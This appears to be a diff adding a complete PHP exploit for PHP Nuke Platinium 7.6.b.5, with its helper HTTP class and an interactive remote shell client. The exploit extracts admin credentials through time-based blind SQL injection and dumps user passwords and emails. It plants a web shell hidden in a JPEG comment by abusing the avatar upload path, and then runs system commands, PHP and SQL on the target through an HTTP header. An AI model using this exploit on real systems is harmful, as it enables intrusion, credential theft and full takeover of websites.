- * - * @access private - * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection) - * @return string $this->get($this->last_redirection) - * @return string $this->recv; - * - */ - function getredirection() - { - if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr)) - { - $this->last_redirection = trim($codearr[2]); - - if(!ereg('://',$this->last_redirection)) - return $this->get('http://'.$this->host.$this->path.$this->last_redirection); - - else - return $this->get($this->last_redirection); - } - else - return $this->recv; - } - - - /** - * This function allows you - * to reset some parameters. - * - * @access public - * @param string func Param - * @example $this->reset('header') - * @example $this->reset('cookie') - * @example $this->reset() - * - */ - function reset($func='') - { - switch($func) - { - case 'header': - $this->header = array(); - break; - - case 'cookie': - $this->cookie = array(); - break; - - default: - $this->cookiejar = ''; - $this->header = array(); - $this->cookie = array(); - $this->allowredirection = ''; - break; - } - } -} - -?> - -# milw0rm.com [2008-07-01] + +## Date: 02/07/08 +## +## Note +## **** +## I modified a bit phpsploit for this exploit, +## because PHP Nuke plays with REQUEST_URI var ... +## +## Requirements +## ************ +## register_globals=On +## +## phpreter +## ******** +## phpreter is really easy to use: +## You can change mode using "mode=", +## with = sql, php or cmd +## +## If you want to understand how it work ... +## read the code. +## +## You can take look to unchunk() function, because +## I think you were many with this problem ... +## + + +# +# Configuration +# + +$xpl = new phpsploit(); + +$xpl->agent('Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14'); + +print "##\n"; +print "## PHP Nuke Platinium 7.6.b.5\n"; +print "## Remote Code Execution Exploit\n"; +print "## by Charles F. 
\n"; +print "## [http://realn.free.fr/]\n"; +print "##\n"; + +if($argc<3) +{ + print "##--- USAGE -----------------------------------------------\n"; + print "## [c:\]# php nuke_platinium_exploit.php [options]\n"; + print "##\n"; + print "## -url Target URL\n"; + print "## -shell If you only wan't to load again phpreter,\n"; + print "## specify with this param your shell URL\n"; + print "## -account A GOD admin account (optional)\n"; + print "## password can be md5 or plain text\n"; + print "## user:passwd\n"; + print "## -bmark How many time must pass to consider SQL\n"; + print "## returned true (in seconds) and how many\n"; + print "## operations you want SQL to do (optional)\n"; + print "## default: 4:6000000\n"; + print "##\n"; + print "## eg:\n"; + print "## ./exploit.php -url http://target.net/ -bmark 5:4000000\n"; + print "## ./exploit.php -url http://target.net/ -admin god:pwd\n"; + print "## ./exploit.php -shell http://target.net/tmp_1339.php\n"; + print "##---------------------------------------------------------\n"; + exit(); +} + +# Parameters + +$url = getparam('url'); +$shell_url = getparam('shell'); +$account = getparam('account') ? getparam('account') : ''; +$bmark = getparam('bmark') ? 
getparam('bmark') : '4:6000000'; + +list($bmark_time, $bmark_numb) = explode(':', $bmark); + +if(!$url && !$shell_url) +{ + print "## Ok dude, are you an idiot ?\n"; + exit(); +} + +# SQL Configuration for phpreter + +$sql = array( + 'config.php', + '$dbhost', + '$dbuname', + '$dbpass', + '$dbname', +); + +if($shell_url) +{ + print "##--- SHELL -----------------------------------------------\n"; + print "## URL: $shell_url\n"; + print "##---------------------------------------------------------\n"; + + $shell = new phpreter($shell_url, '-:-(.*)-:-', 'cmd', $sql, false); + + exit(); +} + +if(!preg_match('#ORDER by date#',$xpl->post($url.'includes/pdf.php',"what=getpdf&table=_blocked_iplist '-"))) +{ + print "## register_globals=Off, exiting.\n"; + print "##\n"; + exit(); +} + +# +# Admin credentials +# + +if(!empty($account)) +{ + list($aid, $pwd) = explode(':',$account); + if(!preg_match('#[a-f0-9]{32}#i',$pwd)) $pwd = md5($pwd); +} + +print "##--- ADMIN -----------------------------------------------\n"; + +print "## Admin ID: "; +isset($aid) ? print $aid."\n" : $aid = bmark('aid','abcdefghijklmnopqrstuvwxyz0123456789'); + +print "## Password: "; +isset($pwd) ? 
print $pwd."\n" : $pwd = bmark('pwd','abcdef0123456789'); + +print "##---------------------------------------------------------\n"; +print "##\n"; + +# +# User data +# + +# We set up admin access + +$c_admin = base64_encode($aid.':'.$pwd); +$xpl->addcookie('admin', urlencode($c_admin)); + +# Ok, now, we need an user for the upload + +$query = "SELECT CONCAT(0x3a3a3a,user_id,0x3a,username,0x3a,user_email,0x3a,user_password,0x3a3a3a) FROM nuke_users ORDER BY user_id DESC LIMIT 1"; +$data = sqlexec($query); + +$data = explode(':::',$data); +list($user_id, $user_name, $user_mail, $user_pwd) = explode(':',$data[1]); + +$c_user = base64_encode($user_id.':'.$user_name.':'.$user_pwd); +$xpl->addcookie('user', urlencode($c_user)); + +# We need a valid SID +$xpl->get($url.'modules.php?name=Forums&file=profile&mode=editprofile'); +preg_match('#sid" value="([a-f0-9]{32})#i', $xpl->getcontent(), $c_sid); + +$c_sid = $c_sid[1]; +$xpl->addcookie('_sid',$c_sid); + +print "##--- USER ------------------------------------------------\n"; +print "## User ID : ".$user_id."\n"; +print "## Name : ".$user_name."\n"; +print "## Mail : ".$user_mail."\n"; +print "## Password: ".$user_pwd."\n"; +print "##---------------------------------------------------------\n"; +print "##\n"; + +# +# Cookies +# + +print "##--- COOKIES -----------------------------------\n"; +print "## user=".$c_user."\n"; +print "## admin=".$c_admin."\n"; +print "##---------------------------------------------------------\n"; +print "##\n"; + +# +# File upload +# + +print "## Uploading the file "; +$rand_filename = 'tmp_'.rand().'.php'; + +# Step #1: avatar_path='w00t.php\0' +sqlexec("UPDATE nuke_bbconfig SET config_value='$rand_filename\\0' WHERE config_name='avatar_path'"); +print "."; + +# Step #2: JPEG upload (bypassing restrictions) + +# $c0de contains as a jpeg comment +# print '-:-';eval(stripslashes($_SERVER['HTTP_SHELL']));print '-:-'; +# +# To people who is laughing to me when I stripslashes() the header: +# On 
specifics servers, HTTP headers are addslashed. +# This gave, in fact, the attack #2 in my Nuked-Klan sploit. +# +$c0de = "" +. "\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01\x01\x01\x00\x60" +. "\x00\x60\x00\x00\xff\xdb\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08" +. "\x07\x07\x07\x09\x09\x08\x0a\x0c\x14\x0d\x0c\x0b\x0b\x0c\x19\x12" +. "\x13\x0f\x14\x1d\x1a\x1f\x1e\x1d\x1a\x1c\x1c\x20\x24\x2e\x27\x20" +. "\x22\x2c\x23\x1c\x1c\x28\x37\x29\x2c\x30\x31\x34\x34\x34\x1f\x27" +. "\x39\x3d\x38\x32\x3c\x2e\x33\x34\x32\xff\xdb\x00\x43\x01\x09\x09" +. "\x09\x0c\x0b\x0c\x18\x0d\x0d\x18\x32\x21\x1c\x21\x32\x32\x32\x32" +. "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +. "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" +. "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\xff\xfe" +. "\x00\x4e\x3c\x3f\x70\x68\x70\x20\x70\x72\x69\x6e\x74\x20\x27\x2d" +. "\x3a\x2d\x27\x3b\x65\x76\x61\x6c\x28\x73\x74\x72\x69\x70\x73\x6c" +. "\x61\x73\x68\x65\x73\x28\x24\x5f\x53\x45\x52\x56\x45\x52\x5b\x27" +. "\x48\x54\x54\x50\x5f\x53\x48\x45\x4c\x4c\x27\x5d\x29\x29\x3b\x70" +. "\x72\x69\x6e\x74\x20\x27\x2d\x3a\x2d\x27\x3b\x20\x3f\x3e\xff\xc0" +. "\x00\x11\x08\x00\x01\x00\x01\x03\x01\x22\x00\x02\x11\x01\x03\x11" +. "\x01\xff\xc4\x00\x1f\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00" +. "\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09" +. "\x0a\x0b\xff\xc4\x00\xb5\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05" +. "\x05\x04\x04\x00\x00\x01\x7d\x01\x02\x03\x00\x04\x11\x05\x12\x21" +. "\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xa1\x08\x23" +. "\x42\xb1\xc1\x15\x52\xd1\xf0\x24\x33\x62\x72\x82\x09\x0a\x16\x17" +. "\x18\x19\x1a\x25\x26\x27\x28\x29\x2a\x34\x35\x36\x37\x38\x39\x3a" +. "\x43\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a" +. "\x63\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a" +. "\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99" +. 
"\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7" +. "\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5" +. "\xd6\xd7\xd8\xd9\xda\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf1" +. "\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xc4\x00\x1f\x01\x00\x03" +. "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x01" +. "\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\xff\xc4\x00\xb5\x11\x00" +. "\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04\x04\x00\x01\x02\x77\x00" +. "\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41\x51\x07\x61\x71\x13" +. "\x22\x32\x81\x08\x14\x42\x91\xa1\xb1\xc1\x09\x23\x33\x52\xf0\x15" +. "\x62\x72\xd1\x0a\x16\x24\x34\xe1\x25\xf1\x17\x18\x19\x1a\x26\x27" +. "\x28\x29\x2a\x35\x36\x37\x38\x39\x3a\x43\x44\x45\x46\x47\x48\x49" +. "\x4a\x53\x54\x55\x56\x57\x58\x59\x5a\x63\x64\x65\x66\x67\x68\x69" +. "\x6a\x73\x74\x75\x76\x77\x78\x79\x7a\x82\x83\x84\x85\x86\x87\x88" +. "\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a\xa2\xa3\xa4\xa5\xa6" +. "\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xc2\xc3\xc4" +. "\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xe2" +. "\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9" +. "\xfa\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf7" +. 
"\xfa\x28\xa2\x80\x3f\xff\xd9\xd9"; + +$data = array( + frmdt_url => $url.'modules.php?name=Forums&file=profile', + 'avatar' => array(frmdt_filename => '1.jpg', frmdt_type => 'image/jpeg', frmdt_content => $c0de), + 'username' => $user_name, 'email' => $user_mail, + 'cur_password' => '', 'new_password' => '', + 'password_confirm' => '', 'icq' => '', + 'aim' => '', 'msn' => '', + 'yim' => '', 'website' => '', + 'location' => '', 'occupation' => '', + 'interests' => '', 'b_day' => '1', + 'b_md' => '1', 'b_year' => '1111', + 'gender' => '1', 'viewemail' => '0', + 'hideonline' => '1', 'notifyreply' => '0', + 'notifypm' => '0', 'popup_pm' => '0', + 'attachsig' => '1', 'allowbbcode' => '1', + 'allowhtml' => '1', 'allowsmilies' => '1', + 'showquickreply' => '0', 'user_wordwrap' => '70', + 'language' => 'english', 'style' => '1', + 'timezone' => '-6', 'dateformat' => 'Y-m-d, H:i:s', + 'MAX_FILE_SIZE' => '99999', 'avatarurl' => '', + 'avatarremoteurl' => '', 'mode' => 'editprofile', + 'agreed' => 'true', 'coppa' => '0', + 'sid' => $c_sid, 'user_id' => $user_id, + 'current_email' => $user_mail, 'submit' => 'Submit', +); + +$xpl->formdata($data); +print "."; + +# Step #3: avatar_path='modules/Forums/images/avatars' +sqlexec("UPDATE nuke_bbconfig SET config_value='modules/Forums/images/avatars' WHERE config_name='avatar_path'"); +print ".\n"; + +# Shell is uploaded, let's load it + +$shell_url = $url.$rand_filename; + +print "##\n"; +print "##--- SHELL -----------------------------------------------\n"; +print "## URL: $shell_url\n"; +print "##---------------------------------------------------------\n"; + +$shell = new phpreter($shell_url, '-:-(.*)-:-', 'cmd', $sql, false); + +# +# Execute SQL Queries +# +function sqlexec($query) +{ + global $xpl,$url; + + $xpl->post($url.'modules/Forums/admin/admin_genesismyadmin.php','this_query='.urlencode($query).'&submit=&with_selected=optimize'); + + return $xpl->getcontent(); +} + +# +# Bmark SQL Injection Function +# +function 
bmark($query,$charset) +{ + global $xpl,$url,$data,$bmark_time,$bmark_numb; + + $d=0; $v='';$max=32; + + $query = 'SELECT '.$query.' FROM nuke_authors WHERE radminsuper=1 ORDER BY aid LIMIT 1'; + + $data = "what=getpdf&table=_blocked_iplist+WHERE+IF((),BENCHMARK($bmark_numb,MD5(0x616161)),1)=1 --"; + + while($d<$max) + { + $d++; + for($z=0;$zpost($url."includes/pdf.php", str_replace('',$sql,$data) ); + + if(time()-$date>$bmark_time) + { + print strtolower(chr($f)); + $v .= chr($f); + break; + } + } + if(strlen($v)==$save) break; + $save = strlen($v); + } + + print "\n"; + return $v; +} + +function getparam($param,$opt='') +{ + global $argv; + foreach($argv as $value => $key) + { + if($key == '-'.$param) return $argv[$value+1]; + } + if($opt) exit("\n-$param parameter required"); + else return; +} + + +/* + * Copyright (c) real + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version 2 + * of the License, or (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. + * + * TITLE: PHPreter + * AUTHOR: Charles "real" F. + * VERSION: 1.0 + * LICENSE: GNU General Public License + * + * This is a really simple class with permits to exec SQL, PHP or CMD + * on a remote host using the HTTP "Shell" header. 
+ * + */ + +class phpreter +{ + var $url; + var $host; + var $port; + var $page; + + var $mode; + + var $ssql; + + var $prompt; + var $phost; + + var $regex; + var $data; + + /** + * __construct() + * + * @param url The url of the remote shell. + * @param regexp The regex to catch cmd result. + * @param mode Mode: php, sql or cmd. + * @param sql An array with the file to include, + * and sql vars + * @param clear Determines if clear() is called + * on startup + */ + function __construct($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true) + { + $this->url = $url; + + $this->regex = '#'.$regexp.'#is'; + + # + # Set important data + # + + $infos = parse_url($this->url); + $this->host = $infos['host']; + $this->port = isset($infos['port']) ? $infos['port'] : 80; + $this->page = $infos['path']; + unset($infos); + + # www.(site).com + $host_tmp = explode('.',$this->host); + $this->phost = $host_tmp[ count($host_tmp)-2 ]; + unset($host_tmp); + + # + # Set up MySQL connection string + # + if(!sizeof($sql)) $this->ssql = ''; + elseif(sizeof($sql)==5) + { + $this->ssql = "include('$sql[0]');" + . "mysql_connect($sql[1], $sql[2], $sql[3]);" + . "mysql_select_db($sql[4]);"; + } + else + { + $this->ssql = "" + . "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');" + . "mysql_select_db('$sql[3]');"; + } + + $this->setmode($mode); + + # + # Main Loop + # + + if($clear) $this->clear(); + print $this->prompt; + + while(!preg_match('#^(quit|exit|close)$#i',($cmd = trim(fgets(STDIN))))) + { + # change mode + if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array)) $this->setmode($array[3]); + + # clear data + elseif(preg_match('#^clear$#i',$cmd)) $this->clear(); + + # else + else print $this->exec($cmd); + + print $this->prompt; + } + } + + /** + * clear() + * Just clears ouput, printing '\n'x50 + */ + function clear() + { + print str_repeat("\n",50); + return 0; + } + + /** + * setmode() + * Set mode (PHP, CMD, SQL) + * You don't have to call it. 
+ * use mode=[php|cmd|sql] instead, + * in the prompt. + */ + function setmode($newmode) + { + $this->mode = strtolower($newmode); + $this->prompt = '['.$this->phost.']['.$this->mode.']# '; + + switch($this->mode) + { + case 'cmd': + $this->data = 'system(\'\');'; + break; + case 'php': + $this->data = ''; + break; + case 'sql': + $this->data = $this->ssql + . '$q = mysql_query(\'\') or print(mysql_error());' + . 'print str_repeat("-",50)."\n";' + . 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))' + . '{' + . 'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $v\n";' + . 'print str_repeat("-",50)."\n";' + . '}'; + break; + } + return $this->mode; + } + + /** + * exec() + * Execute any query and catch the result. + * You don't have to call it. + */ + function exec($cmd) + { + if(!strlen($this->data)) $shell = $cmd; + else $shell = str_replace('',addslashes($cmd),$this->data); + + $fp = fsockopen($this->host, $this->port, &$errno, &$errstr, 30); + + $req = "GET ".$this->page." HTTP/1.1\r\n"; + $req .= "Host: ". $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) ."\r\n"; + $req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n"; + $req .= "Shell: $shell\r\n"; + $req .= "Content-transfert-encoding: base64\r\n"; + $req .= "Connection: close\r\n\r\n"; + + unset($shell); + + fputs($fp,$req); + + $content = ''; + while(!feof($fp)) $content .= fgets($fp,128); + + fclose($fp); + + # Remove headers + $data = explode("\r\n\r\n",$content); + array_shift($data); + $content = implode("\r\n\r\n",$data); + + $content = $this->unchunk($content); + + preg_match($this->regex,$content,$data); + + if($data[1][ strlen($data)-1 ] != "\n") $data[1] .= "\n"; + + return $data[1]; + } + + /** + * unchunk() + * This function aims to remove chunked content sizes which + * are putted by apache server when it uses chunked + * transfert-encoding. 
+ */ + function unchunk($data) + { + $dsize = 1; + $offset = 0; + + while($dsize>0) + { + $hsize_size = strpos($data, "\r\n", $offset) - $offset; + + $hsize = substr($data, $offset, $hsize_size); + $dsize = hexdec($hsize); + + /* + print "offset (dec) = $offset\n"; + print "hsize (hex) = $hsize\n"; + print "dsize (dec) = $dsize\n"; + print "crlfp (dec) = $hsize_size\n"; + print "--\n"; + */ + + # Remove $hsize\r\n from $data + $data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) ); + + $offset += $dsize; + + # Remove the \r\n before the next $hsize + $data = substr($data, 0, $offset) . substr($data, ($offset+2) ); + } + + return $data; + } +} + +/* + * + * Copyright (C) darkfig + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version 2 + * of the License, or (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. + * + * TITLE: PhpSploit Class + * REQUIREMENTS: PHP 4 / PHP 5 + * VERSION: 2.0 + * LICENSE: GNU General Public License + * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt + * FILENAME: phpsploitclass.php + * + * CONTACT: gmdarkfig@gmail.com (french / english) + * GREETZ: Sparah, Ddx39 + * + * DESCRIPTION: + * The phpsploit is a class implementing a web user agent. + * You can add cookies, headers, use a proxy server with (or without) a + * basic authentification. It supports the GET and the POST method. 
It can + * also be used like a browser with the cookiejar() function (which allow + * a server to add several cookies for the next requests) and the + * allowredirection() function (which allow the script to follow all + * redirections sent by the server). It can return the content (or the + * headers) of the request. Others useful functions can be used for debugging. + * A manual is actually in development but to know how to use it, you can + * read the comments. + * + * CHANGELOG: + * + * [2007-06-10] (2.0) + * * Code: Code optimization + * * New: Compatible with PHP 4 by default + * + * [2007-01-24] (1.2) + * * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) + * * New: multipart/form-data enctype is now supported + * + * [2006-12-31] (1.1) + * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) + * * New: You can now call the getheader() / getcontent() function without parameters + * + * [2006-12-30] (1.0) + * * First version + * + */ + +class phpsploit +{ + var $proxyhost; + var $proxyport; + var $host; + var $path; + var $port; + var $method; + var $url; + var $packet; + var $proxyuser; + var $proxypass; + var $header; + var $cookie; + var $data; + var $boundary; + var $allowredirection; + var $last_redirection; + var $cookiejar; + var $recv; + var $cookie_str; + var $header_str; + var $server_content; + var $server_header; + + + /** + * This function is called by the + * get()/post()/formdata() functions. + * You don't have to call it, this is + * the main function. 
+ * + * @access private + * @return string $this->recv ServerResponse + * + */ + function sock() + { + if(!empty($this->proxyhost) && !empty($this->proxyport)) + $socket = @fsockopen($this->proxyhost,$this->proxyport); + else + $socket = @fsockopen($this->host,$this->port); + + if(!$socket) + die("Error: Host seems down"); + + # modification (by real) + preg_match("#^http://[^/]+(/.*)$#i", $this->url, $tmp); + $tmp = $tmp[1]; + + if($this->method=='get') + $this->packet = 'GET '.$tmp." HTTP/1.1\r\n"; + + elseif($this->method=='post' or $this->method=='formdata') + $this->packet = 'POST '.$tmp." HTTP/1.1\r\n"; + + else + die("Error: Invalid method"); + + if(!empty($this->proxyuser)) + $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n"; + + if(!empty($this->header)) + $this->packet .= $this->showheader(); + + if(!empty($this->cookie)) + $this->packet .= 'Cookie: '.$this->showcookie()."\r\n"; + + $this->packet .= 'Host: '.$this->host."\r\n"; + $this->packet .= "Connection: Close\r\n"; + + if($this->method=='post') + { + $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; + $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; + $this->packet .= $this->data."\r\n"; + } + elseif($this->method=='formdata') + { + $this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n"; + $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; + $this->packet .= $this->data; + } + + $this->packet .= "\r\n"; + $this->recv = ''; + + fputs($socket,$this->packet); + + while(!feof($socket)) + $this->recv .= fgets($socket); + + fclose($socket); + + if($this->cookiejar) + $this->getcookie(); + + if($this->allowredirection) + return $this->getredirection(); + else + return $this->recv; + } + + + /** + * This function allows you to add several + * cookies in the request. 
+ * + * @access public + * @param string cookn CookieName + * @param string cookv CookieValue + * @example $this->addcookie('name','value') + * + */ + function addcookie($cookn,$cookv) + { + if(!isset($this->cookie)) + $this->cookie = array(); + + $this->cookie[$cookn] = $cookv; + } + + + /** + * This function allows you to add several + * headers in the request. + * + * @access public + * @param string headern HeaderName + * @param string headervalue Headervalue + * @example $this->addheader('Client-IP', '128.5.2.3') + * + */ + function addheader($headern,$headervalue) + { + if(!isset($this->header)) + $this->header = array(); + + $this->header[$headern] = $headervalue; + } + + + /** + * This function allows you to use an + * http proxy server. Several methods + * are supported. + * + * @access public + * @param string proxy ProxyHost + * @param integer proxyp ProxyPort + * @example $this->proxy('localhost',8118) + * @example $this->proxy('localhost:8118') + * + */ + function proxy($proxy,$proxyp='') + { + if(empty($proxyp)) + { + $proxarr = explode(':',$proxy); + $this->proxyhost = $proxarr[0]; + $this->proxyport = (int)$proxarr[1]; + } + else + { + $this->proxyhost = $proxy; + $this->proxyport = (int)$proxyp; + } + + if($this->proxyport > 65535) + die("Error: Invalid port number"); + } + + + /** + * This function allows you to use an + * http proxy server which requires a + * basic authentification. 
Several + * methods are supported: + * + * @access public + * @param string proxyauth ProxyUser + * @param string proxypass ProxyPass + * @example $this->proxyauth('user','pwd') + * @example $this->proxyauth('user:pwd'); + * + */ + function proxyauth($proxyauth,$proxypass='') + { + if(empty($proxypass)) + { + $posvirg = strpos($proxyauth,':'); + $this->proxyuser = substr($proxyauth,0,$posvirg); + $this->proxypass = substr($proxyauth,$posvirg+1); + } + else + { + $this->proxyuser = $proxyauth; + $this->proxypass = $proxypass; + } + } + + + /** + * This function allows you to set + * the 'User-Agent' header. + * + * @access public + * @param string useragent Agent + * @example $this->agent('Firefox') + * + */ + function agent($useragent) + { + $this->addheader('User-Agent',$useragent); + } + + + /** + * This function returns the headers + * which will be in the next request. + * + * @access public + * @return string $this->header_str Headers + * @example $this->showheader() + * + */ + function showheader() + { + $this->header_str = ''; + + if(!isset($this->header)) + return; + + foreach($this->header as $name => $value) + $this->header_str .= $name.': '.$value."\r\n"; + + return $this->header_str; + } + + + /** + * This function returns the cookies + * which will be in the next request. + * + * @access public + * @return string $this->cookie_str Cookies + * @example $this->showcookie() + * + */ + function showcookie() + { + $this->cookie_str = ''; + + if(!isset($this->cookie)) + return; + + foreach($this->cookie as $name => $value) + $this->cookie_str .= $name.'='.$value.'; '; + + return $this->cookie_str; + } + + + /** + * This function returns the last + * formed http request. 
+ * + * @access public + * @return string $this->packet HttpPacket + * @example $this->showlastrequest() + * + */ + function showlastrequest() + { + if(!isset($this->packet)) + return; + else + return $this->packet; + } + + + /** + * This function sends the formed + * http packet with the GET method. + * + * @access public + * @param string url Url + * @return string $this->sock() + * @example $this->get('localhost/index.php?var=x') + * @example $this->get('http://localhost:88/tst.php') + * + */ + function get($url) + { + $this->target($url); + $this->method = 'get'; + return $this->sock(); + } + + + /** + * This function sends the formed + * http packet with the POST method. + * + * @access public + * @param string url Url + * @param string data PostData + * @return string $this->sock() + * @example $this->post('http://localhost/','helo=x') + * + */ + function post($url,$data) + { + $this->target($url); + $this->method = 'post'; + $this->data = $data; + return $this->sock(); + } + + + /** + * This function sends the formed http + * packet with the POST method using + * the multipart/form-data enctype. 
+ * + * @access public + * @param array array FormDataArray + * @return string $this->sock() + * @example $formdata = array( + * frmdt_url => 'http://localhost/upload.php', + * frmdt_boundary => '123456', # Optional + * 'var' => 'example', + * 'file' => array( + * frmdt_type => 'image/gif', # Optional + * frmdt_transfert => 'binary' # Optional + * frmdt_filename => 'hello.php, + * frmdt_content => '')); + * $this->formdata($formdata); + * + */ + function formdata($array) + { + $this->target($array[frmdt_url]); + $this->method = 'formdata'; + $this->data = ''; + + if(!isset($array[frmdt_boundary])) + $this->boundary = 'phpsploit'; + else + $this->boundary = $array[frmdt_boundary]; + + foreach($array as $key => $value) + { + if(!preg_match('#^frmdt_(boundary|url)#',$key)) + { + $this->data .= str_repeat('-',29).$this->boundary."\r\n"; + $this->data .= 'Content-Disposition: form-data; name="'.$key.'";'; + + if(!is_array($value)) + { + $this->data .= "\r\n\r\n".$value."\r\n"; + } + else + { + $this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n"; + + if(isset($array[$key][frmdt_type])) + $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n"; + + if(isset($array[$key][frmdt_transfert])) + $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n"; + + $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n"; + } + } + } + + $this->data .= str_repeat('-',29).$this->boundary."--\r\n"; + return $this->sock(); + } + + + /** + * This function returns the content + * of the server response, without + * the headers. 
+ * + * @access public + * @param string code ServerResponse + * @return string $this->server_content + * @example $this->getcontent() + * @example $this->getcontent($this->get('http://localhost/')) + * + */ + function getcontent($code='') + { + if(empty($code)) + $code = $this->recv; + + $code = explode("\r\n\r\n",$code); + $this->server_content = ''; + + for($i=1;$iserver_content .= $code[$i]; + + return $this->server_content; + } + + + /** + * This function returns the headers + * of the server response, without + * the content. + * + * @access public + * @param string code ServerResponse + * @return string $this->server_header + * @example $this->getcontent() + * @example $this->getcontent($this->post('http://localhost/','1=2')) + * + */ + function getheader($code='') + { + if(empty($code)) + $code = $this->recv; + + $code = explode("\r\n\r\n",$code); + $this->server_header = $code[0]; + + return $this->server_header; + } + + + /** + * This function is called by the + * cookiejar() function. It adds the + * value of the "Set-Cookie" header + * in the "Cookie" header for the + * next request. You don't have to + * call it. + * + * @access private + * @param string code ServerResponse + * + */ + function getcookie() + { + foreach(explode("\r\n",$this->getheader()) as $header) + { + if(preg_match('/set-cookie/i',$header)) + { + $fequal = strpos($header,'='); + $fvirgu = strpos($header,';'); + + // 12=strlen('set-cookie: ') + $cname = substr($header,12,$fequal-12); + $cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1)); + + $this->cookie[trim($cname)] = trim($cvalu); + } + } + } + + + /** + * This function is called by the + * get()/post() functions. You + * don't have to call it. 
+ * + * @access private + * @param string urltarg Url + * @example $this->target('http://localhost/') + * + */ + function target($urltarg) + { + if(!ereg('^http://',$urltarg)) + $urltarg = 'http://'.$urltarg; + + $urlarr = parse_url($urltarg); + $this->url = 'http://'.$urlarr['host'].$urlarr['path']; + + if(isset($urlarr['query'])) + $this->url .= '?'.$urlarr['query']; + + $this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80; + $this->host = $urlarr['host']; + + if($this->port != '80') + $this->host .= ':'.$this->port; + + if(!isset($urlarr['path']) or empty($urlarr['path'])) + die("Error: No path precised"); + + $this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1); + + if($this->port > 65535) + die("Error: Invalid port number"); + } + + + /** + * If you call this function, + * the script will extract all + * 'Set-Cookie' headers values + * and it will automatically add + * them into the 'Cookie' header + * for all next requests. + * + * @access public + * @param integer code 1(enabled) 0(disabled) + * @example $this->cookiejar(0) + * @example $this->cookiejar(1) + * + */ + function cookiejar($code) + { + if($code=='0') + $this->cookiejar=FALSE; + + elseif($code=='1') + $this->cookiejar=TRUE; + } + + + /** + * If you call this function, + * the script will follow all + * redirections sent by 